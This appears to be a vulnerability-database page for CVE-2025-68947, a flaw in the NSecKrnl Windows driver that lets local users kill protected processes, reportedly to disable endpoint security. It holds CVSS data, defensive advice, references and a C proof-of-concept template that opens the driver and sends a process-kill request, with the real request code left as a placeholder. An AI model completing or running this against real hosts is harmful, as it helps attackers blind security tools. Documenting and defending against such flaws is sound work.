Security Vulnerability Report
CVE-2025-68947 CVSS 4.7 MEDIUM

CVE-2025-68947

Published: 2026-01-13 22:16:06
Last Modified: 2026-04-15 00:35:42
Source: 9119a7d8-5eab-497f-8521-727c672e3725 (NVD sourceIdentifier of the reporting CNA; NVD vulnStatus for this record is "Deferred", i.e. NVD has not added its own CPE/CWE enrichment)

Description

NSecsoft 'NSecKrnl' is a Windows driver that allows a local, authenticated attacker to terminate processes owned by other users, including SYSTEM and Protected Processes, by issuing crafted IOCTL requests to the driver. The CNA classifies the weakness as CWE-862 (missing authorization): the driver performs the kill on the caller's behalf without checking that the caller has rights to the target process. The references describe this being used as a bring-your-own-vulnerable-driver (BYOVD) primitive to kill endpoint-security processes, so for defenders the practical question is whether the signed driver can be loaded on their hosts at all (driver blocklist / WDAC), not just whether NSecsoft software is installed.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
(The v3.1 values above are "Secondary", i.e. CNA-supplied. The same source also supplies a CVSS 4.0 vector, CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N, base score 5.7 MEDIUM; AT:P reflects that the vulnerable driver must be present or brought along by the attacker. Impact is scored as availability-only because the primitive is process termination; the references show the process being terminated is typically a security agent, so treat this as a defense-evasion issue rather than a plain local DoS when prioritizing.)

Configurations (Affected Products)

No CPE configuration data is available in the NVD record for this CVE.

NSecKrnl: all versions (as listed on this page; the NVD record itself gives no version range, so confirm against the CNA/CSAF advisory in the references)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the listing is a template, not a working exploit: the IOCTL code it sends is marked in the source as an example value, and the device name is not confirmed against the driver binary, so both must be verified before the listing demonstrates anything.
c
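// CVE-2025-68947 PoC - NSecKrnl Driver Process Termination
//
// Demonstrates the missing-authorization (CWE-862) primitive described in the
// advisory: a low-privileged local user opens the NSecKrnl device object and
// asks the driver to terminate an arbitrary PID on their behalf.
//
// Compile (MinGW): gcc -o nseckrnl_poc nseckrnl_poc.c
// Usage:           nseckrnl_poc <target_pid> [ioctl_code_hex]
//
// NOTE(review): IOCTL_TERMINATE_PROCESS below is a placeholder, not the
// driver's real control code, and the device path has not been confirmed
// against the driver binary. Both must be verified (e.g. from the driver's
// dispatch routine) before this program demonstrates anything; the optional
// second argument lets the real code be supplied without recompiling.
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <tlhelp32.h>

// Placeholder control code; see the note above.
#define IOCTL_TERMINATE_PROCESS 0xDEADBEEF
// Device object name used by the original listing.
#define NSECKRNL_DEVICE_PATH "\\\\.\\NSecKrnl"

// Older MinGW SDK headers may not define this access right (value from the
// Windows SDK).
#ifndef PROCESS_QUERY_LIMITED_INFORMATION
#define PROCESS_QUERY_LIMITED_INFORMATION 0x1000
#endif

// Parse an unsigned 32-bit integer from `text` in the given base.
// Returns 1 and stores the value in *out on success, 0 on empty, negative,
// non-numeric, trailing-garbage or out-of-range input. This replaces atoi(),
// which silently turns bad input into 0 (PID 0 is the System Idle Process).
static int parse_u32(const char *text, int base, DWORD *out)
{
    char *end = NULL;
    unsigned long value;

    if (text == NULL || *text == '\0' || *text == '-')
        return 0;

    errno = 0;
    value = strtoul(text, &end, base);
    if (errno != 0 || end == text || *end != '\0' || value > 0xFFFFFFFFUL)
        return 0;

    *out = (DWORD)value;
    return 1;
}

// Best-effort check of whether `pid` is still running.
// Returns 1 if alive, 0 if it has exited / no longer exists, -1 if it cannot
// be determined (OpenProcess may be denied, e.g. on a protected process).
static int target_still_running(DWORD pid)
{
    HANDLE hProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
    DWORD exitCode = 0;
    int alive;

    if (hProc == NULL) {
        // ERROR_INVALID_PARAMETER is what OpenProcess typically reports for a
        // PID that no longer exists; anything else (access denied, ...) is
        // "unknown" rather than "gone".
        return (GetLastError() == ERROR_INVALID_PARAMETER) ? 0 : -1;
    }

    alive = (GetExitCodeProcess(hProc, &exitCode) && exitCode == STILL_ACTIVE) ? 1 : 0;
    CloseHandle(hProc);
    return alive;
}

// Entry point: open the driver, send the kill IOCTL for argv[1], then verify
// the target actually went away instead of trusting DeviceIoControl's return
// value alone. Exit status is 0 on confirmed (or unverifiable) termination,
// 1 on bad arguments, open failure, IOCTL failure or a surviving target.
int main(int argc, char *argv[])
{
    HANDLE hDevice;
    DWORD targetPid = 0;
    DWORD ioctlCode = IOCTL_TERMINATE_PROCESS;
    DWORD bytesReturned = 0;
    BOOL ok;

    if (argc < 2 || argc > 3) {
        fprintf(stderr, "Usage: %s <target_pid> [ioctl_code_hex]\n", argv[0]);
        return 1;
    }

    if (!parse_u32(argv[1], 10, &targetPid) || targetPid == 0) {
        fprintf(stderr, "[-] Invalid target PID: %s\n", argv[1]);
        return 1;
    }

    if (argc == 3 && !parse_u32(argv[2], 16, &ioctlCode)) {
        fprintf(stderr, "[-] Invalid IOCTL code (expected hex): %s\n", argv[2]);
        return 1;
    }

    // CreateFileA is used explicitly so the narrow device path also compiles
    // in a UNICODE build.
    hDevice = CreateFileA(
        NSECKRNL_DEVICE_PATH,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        // GetLastError() returns a DWORD (unsigned long): %lu, not %d.
        fprintf(stderr, "[-] Failed to open NSecKrnl driver. Error: %lu\n", GetLastError());
        return 1;
    }
    printf("[+] Successfully opened handle to NSecKrnl driver\n");

    printf("[*] Attempting to terminate process with PID: %lu (IOCTL 0x%08lX)\n",
           targetPid, ioctlCode);

    // Input buffer is the raw 32-bit PID, as in the original listing; the
    // real request layout must be confirmed against the driver.
    ok = DeviceIoControl(
        hDevice,
        ioctlCode,
        &targetPid,
        sizeof(targetPid),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    if (!ok) {
        fprintf(stderr, "[-] DeviceIoControl failed. Error: %lu\n", GetLastError());
        CloseHandle(hDevice);
        return 1;
    }
    CloseHandle(hDevice);

    // A successful DeviceIoControl only proves the driver accepted the request
    // (or that the placeholder IOCTL mapped to some no-op handler); confirm
    // the target is gone before reporting success.
    switch (target_still_running(targetPid)) {
    case 0:
        printf("[+] Process %lu terminated successfully!\n", targetPid);
        return 0;
    case 1:
        printf("[-] Driver accepted the IOCTL but process %lu is still running\n", targetPid);
        return 1;
    default:
        printf("[?] IOCTL accepted; could not confirm whether process %lu exited\n", targetPid);
        return 0;
    }
}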

References

- https://github.com/ANYLNK/NSecSoftBYOVD
- https://hexastrike.com/resources/blog/threat-intelligence/valleyrat-exploiting-byovd-to-kill-endpoint-security/
- https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2026/va-26-013-01.json (CISA CSAF advisory)
- https://www.cve.org/CVERecord?id=CVE-2025-68947
- https://www.virustotal.com/gui/file/206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261 (VirusTotal entry for the referenced sample; the SHA-256 in the URL is a usable blocklist/hunting indicator once you have confirmed what the sample is)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68947", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2026-01-13T22:16:06.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NSecsoft 'NSecKrnl' is a Windows driver that allows a local, authenticated attacker to terminate processes owned by other users, including SYSTEM and Protected Processes by issuing crafted IOCTL requests to the driver."}, {"lang": "es", "value": "NSecsoft 'NSecKrnl' es un controlador de Windows que permite a un atacante local y autenticado terminar procesos propiedad de otros usuarios, incluyendo SYSTEM y Procesos Protegidos, mediante la emisión de solicitudes IOCTL manipuladas al controlador."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/ANYLNK/NSecSoftBYOVD", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://hexastrike.com/resources/blog/threat-intelligence/valleyrat-exploiting-byovd-to-kill-endpoint-security/", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2026/va-26-013-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-68947", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}, {"url": "https://www.virustotal.com/gui/file/206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261", "source": "9119a7d8-5eab-497f-8521-727c672e3725"}]}}